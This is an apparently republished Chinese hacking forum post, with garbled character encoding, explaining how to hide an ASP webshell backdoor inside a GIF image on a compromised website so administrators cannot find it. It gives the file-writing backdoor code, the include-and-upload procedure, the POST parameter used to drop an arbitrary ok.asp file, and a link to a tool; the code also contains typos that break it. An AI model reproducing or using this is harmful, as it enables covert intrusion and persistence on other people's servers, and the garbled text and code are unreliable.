style="display:block;padding:0px 10px;" class="ContentFont">腳本后門的發(fā)展史:
1,
腳本后門之圖片中的后門
。最開始就是直接放一個ASP文件上去。2。把ASP文件加密才放上去。
3。把腳本插入到代碼中去。(我經(jīng)常用這種)
不過一樣被查得出來,我前段時候手工檢測一個站的腳本安全。
發(fā)現(xiàn)這個站被種了21個木馬。
所以我就想到了,怎么樣才能不被發(fā)現(xiàn)不能被查殺。
最后我研究了一下如果把腳本插入到圖片中。
然后在ASP中調(diào)用圖片中的腳本程序應(yīng)該就可以了。
測試的時候通過了。
現(xiàn)在我把我的心德寫一下。
讓大家來分析一下。共同進步和完善這種方法。
在研究過程中我看了GIF圖片的結(jié)構(gòu)文檔方面的書。
GIF圖片都是以 00 3B 為結(jié)束的。
換句話說00 3B 后面的不會顯示出來。
所以我們在00 3B后面插入代碼就行了。
當(dāng)然代碼我們加密放到圖片中去效果更好。
我寫了一個程序來這么做。
這里要說一下,在圖片中00 3B后面的是不會顯示出來的。
但其中的代碼已經(jīng)運行了。圖片也會正常顯示出來。
測試:
在圖片后面加入:<%=now%>
然后在一個ASP文件中加入:
然后你們下載這個圖片,發(fā)現(xiàn)圖片最后面變成了時間。很正常因為圖片放到了ASP腳本中運行了其中的代碼。
換句話來說,如果寫的是一段生成文件的腳本。
那么我們提交特定的參數(shù)讓圖片中的代碼去生成文件。
這樣就實現(xiàn)了我們的后門。
1:這種方法要做的工作就是在目標(biāo)站點中找一張GIF圖片然后把代碼插入到圖片中,再上傳到站點中去。這樣作管理員很難找到木馬在哪里。打死也想不到木馬在圖片中。
2:我們插入的代碼只有一行就是那個include file .....
找個文件大點的ASP文件給插進去就行了,
電腦資料
《腳本后門之圖片中的后門》(http://www.lotusphilosophies.com)。然后我們在本地POST數(shù)據(jù)提交給ASP引用圖片的URL這樣就完成了工作。
我的插入圖片的腳本:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set bjFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set bjCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set bjCountFile=Nothing %>
<% Set bjFSO = Nothing %>
這段代碼主要就是在當(dāng)前目錄下生成一個ok.asp文件。
文件內(nèi)容是由我們提交的數(shù)據(jù).用request("cyfddata")來獲取的。
這段代碼加密后插入到圖片中去。
下面我把我程序的代碼貼出來。(倒程序代碼沒有打包在里面。明天再貼上來)
現(xiàn)在給程序地址下載:
點這里下載測試程序。
本地自己構(gòu)建一個提交表單向ASP文件提交(加入圖片那個文件)
表單文本框輸入內(nèi)容名稱是:cyfddata
后感:
我本人認為這種方法,管理員很難查到。這是我兩天前想到的作出來了,
可能有些問題希望和大家一起討論,必競,為了追求技術(shù)就得研究技術(shù)。
共享知識,從而升華。
感覺去研究一些新東西,人活得更XS些。
利用程序
www.dv28.com/live/ScriptInpic.rar